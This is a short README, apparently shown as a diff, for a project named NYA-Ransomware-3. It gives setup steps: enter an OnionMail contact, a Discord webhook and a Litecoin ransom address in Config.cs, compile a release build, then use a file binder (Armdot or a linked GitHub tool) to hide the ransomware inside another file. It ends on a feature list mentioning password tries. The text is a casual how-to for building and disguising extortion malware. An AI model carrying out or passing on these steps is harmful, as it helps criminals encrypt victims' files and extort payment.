Doggosaurus/NYA-Ransomware-3/README.md

 Go into Config.cs<br />
 Input ur OnionMail + Discord Webhook and ur LTC address the rest is just goofy and random stuff<br />
 Set The Arch to Release instead of debug and Compile Have Fun :3<br />
+Now Use a File Binder i Recommend Armdot but this one shall also work https://github.com/rohan-patra/File-Binder-Pro <br />
+Make Sure to Set the Path that it extracts to The "Current Path" or smth To make it Work!

 ## Features

 - Max 3 Password Tries